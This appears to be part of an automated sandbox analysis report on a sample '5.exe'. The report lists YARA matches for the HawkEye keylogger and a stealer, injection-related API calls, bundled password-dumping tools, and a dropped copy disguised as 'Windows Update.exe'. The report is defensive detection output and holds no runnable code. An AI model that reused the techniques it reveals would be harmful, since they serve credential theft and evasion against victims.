          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.350262579.00000000075C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.350302983.0000000007610000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.391554115.0000000007610000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.357332118.0000000007610000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_004030E3
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 00401ED0 appears 46 times
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 0040569E appears 36 times
          Source: C:\Users\user\Desktop\5.exeCode function: String function: 00401ED0 appears 46 times
          Source: C:\Users\user\Desktop\5.exeCode function: String function: 0040569E appears 36 times
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD5BAE NtWriteVirtualMemory,10_2_04BD5BAE
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD5B06 NtUnmapViewOfSection,10_2_04BD5B06
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD5976 NtQuerySystemInformation,10_2_04BD5976
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD5B81 NtWriteVirtualMemory,10_2_04BD5B81
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD5932 NtQuerySystemInformation,10_2_04BD5932
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,16_2_00408836
          Source: 5.exe, 00000001.00000003.263017568.0000000014BEF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5.exe
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000001.00000003.256130279.0000000014A56000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5.exe
          Source: 5.exeBinary or memory string: OriginalFilename vs 5.exe
          Source: 5.exeBinary or memory string: OriginalFileName vs 5.exe
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291130576.0000000002861000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to behavior
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@19/18@2/4
          Source: C:\Users\user\Desktop\5.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,16_2_00415AFD
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_00401489
          Source: 5.exeVirustotal: Detection: 41%
          Source: 5.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\5.exeFile read: C:\Users\user\Desktop\5.exeJump to behavior
          Source: C:\Users\user\Desktop\5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe"
